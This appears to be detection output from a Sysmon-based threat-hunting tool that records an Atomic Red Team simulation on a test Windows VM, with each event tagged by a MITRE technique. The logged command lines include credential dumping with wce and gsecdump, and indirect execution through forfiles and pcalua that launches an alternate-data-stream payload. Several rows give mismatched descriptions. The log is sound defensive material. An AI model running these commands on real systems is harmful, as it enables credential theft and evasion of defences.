+[T1003] Credential Dumping - Process,1563549077.149274,2019-07-19T19:11:17.149274+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\cmd.exe) tried dumping credentials through commandline ( "C:\Windows\system32\cmd.exe" /c "wce -o output.txt" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4115
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:11:17.097
+ 747F3D96-DD95-5D31-0000-0010B38E4A00
+ 5216
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "wce -o output.txt"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-DD47-5D31-0000-001015874900
+ 5840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549077.149274,2019-07-19T19:11:17.149274+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wce -o output.txt" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4115
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:11:17.097
+ 747F3D96-DD95-5D31-0000-0010B38E4A00
+ 5216
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "wce -o output.txt"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-DD47-5D31-0000-001015874900
+ 5840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549077.107912,2019-07-19T19:11:17.107912+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4114
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:11:17.016
+ 747F3D96-DD95-5D31-0000-0010148A4A00
+ 5476
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-DD47-5D31-0000-001015874900
+ 5840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1003] Credential Dumping - Process,1563549077.027188,2019-07-19T19:11:17.027188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\cmd.exe) tried dumping credentials through commandline ( "C:\Windows\system32\cmd.exe" /c "gsecdump -a" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4113
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:11:16.975
+ 747F3D96-DD94-5D31-0000-0010F4864A00
+ 3920
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "gsecdump -a"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-DD47-5D31-0000-001015874900
+ 5840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549077.027188,2019-07-19T19:11:17.027188+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "gsecdump -a" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4113
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:11:16.975
+ 747F3D96-DD94-5D31-0000-0010F4864A00
+ 3920
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "gsecdump -a"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-DD47-5D31-0000-001015874900
+ 5840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1563549076.48799,2019-07-19T19:11:16.487990+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"
+
+
+
+
+ 3
+ 5
+ 4
+ 3
+ 0
+ 0x8000000000000000
+
+
+ 4111
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+ Suspicious NetCon
+ 2019-07-19 15:11:03.652
+ 747F3D96-DD47-5D31-0000-001015874900
+ 5840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ MSEDGEWIN10\IEUser
+ tcp
+ true
+ false
+ 10.0.2.15
+ MSEDGEWIN10.home
+ 49744
+
+ false
+ 151.101.0.133
+
+ 443
+ https
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1563549068.184716,2019-07-19T19:11:08.184716+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /user) ,1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4110
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:11:07.987
+ 747F3D96-DD8B-5D31-0000-001094584A00
+ 5792
+ C:\Windows\System32\whoami.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\whoami.exe" /user
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
+ 747F3D96-DD47-5D31-0000-001015874900
+ 5840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1563549068.184716,2019-07-19T19:11:08.184716+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /user ) contain suspicious command ( whoami.exe),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4110
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:11:07.987
+ 747F3D96-DD8B-5D31-0000-001094584A00
+ 5792
+ C:\Windows\System32\whoami.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\whoami.exe" /user
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
+ 747F3D96-DD47-5D31-0000-001015874900
+ 5840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1086 ] Powershell with Suspicious Argument,1563549052.700901,2019-07-19T19:10:52.700901+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell) in event with Command Line (powershell) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe") in directory : ( c:\AtomicRedTeam\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4108
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:09:59.829
+ 747F3D96-DD47-5D31-0000-001015874900
+ 5840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ powershell
+ c:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
+ 747F3D96-DD37-5D31-0000-00109D4C4900
+ 5632
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1563549052.700901,2019-07-19T19:10:52.700901+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4108
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:09:59.829
+ 747F3D96-DD47-5D31-0000-001015874900
+ 5840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ powershell
+ c:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
+ 747F3D96-DD37-5D31-0000-00109D4C4900
+ 5632
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548999.931135,2019-07-19T19:09:59.931135+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4107
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:09:43.301
+ 747F3D96-DD37-5D31-0000-00109D4C4900
+ 5632
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe"
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D4B8-5D31-0000-0010A8CE0600
+ 4416
+ C:\Windows\explorer.exe
+ C:\Windows\Explorer.EXE
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1563548980.973075,2019-07-19T19:09:40.973075+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"
+
+
+
+
+ 3
+ 5
+ 4
+ 3
+ 0
+ 0x8000000000000000
+
+
+ 4105
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+ Suspicious NetCon
+ 2019-07-19 14:57:52.847
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ MSEDGEWIN10\IEUser
+ tcp
+ true
+ false
+ 10.0.2.15
+ MSEDGEWIN10.home
+ 49734
+
+ false
+ 151.101.0.133
+
+ 443
+ https
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548278.359021,2019-07-19T18:57:58.359021+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4104
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:55.181
+ 747F3D96-DA73-5D31-0000-001061933F00
+ 1724
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1202] Indirect Command Execution,1563548275.236766,2019-07-19T18:57:55.236766+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4103
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:55.056
+ 747F3D96-DA73-5D31-0000-0010918F3F00
+ 4092
+ C:\Windows\System32\forfiles.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ ForFiles - Executes a command on selected files
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80
+ 747F3D96-DA73-5D31-0000-00106A8D3F00
+ 1052
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c " c:\folder\normal.dll:evil.exe
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548275.138826,2019-07-19T18:57:55.138826+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c " c:\folder\normal.dll:evil.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4102
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:55.024
+ 747F3D96-DA73-5D31-0000-00106A8D3F00
+ 1052
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c " c:\folder\normal.dll:evil.exe
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1202] Indirect Command Execution,1563548274.165319,2019-07-19T18:57:54.165319+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4100
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:54.123
+ 747F3D96-DA72-5D31-0000-001056513F00
+ 3680
+ C:\Windows\System32\forfiles.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ ForFiles - Executes a command on selected files
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80
+ 747F3D96-DA72-5D31-0000-0010044F3F00
+ 1300
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548274.129841,2019-07-19T18:57:54.129841+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4099
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:54.080
+ 747F3D96-DA72-5D31-0000-0010044F3F00
+ 1300
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548274.099318,2019-07-19T18:57:54.099318+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4098
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:53.815
+ 747F3D96-DA71-5D31-0000-00101A463F00
+ 6168
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1202] Indirect Command Execution,1563548273.882434,2019-07-19T18:57:53.882434+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a C:\Windows\system32\javacpl.cpl ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4097
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:52.816
+ 747F3D96-DA70-5D31-0000-00100E2C3F00
+ 112
+ C:\Windows\System32\pcalua.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Program Compatibility Assistant
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ pcalua.exe -a C:\Windows\system32\javacpl.cpl
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653
+ 747F3D96-DA70-5D31-0000-001007293F00
+ 608
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a C:\Windows\system32\javacpl.cpl"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548272.982726,2019-07-19T18:57:52.982726+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a C:\Windows\system32\javacpl.cpl" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4096
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:52.784
+ 747F3D96-DA70-5D31-0000-001007293F00
+ 608
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a C:\Windows\system32\javacpl.cpl"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1202] Indirect Command Execution,1563548272.92361,2019-07-19T18:57:52.923610+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a Java ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4095
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:50.232
+ 747F3D96-DA6E-5D31-0000-001081F93E00
+ 1284
+ C:\Windows\System32\pcalua.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Program Compatibility Assistant
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ pcalua.exe -a Java
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
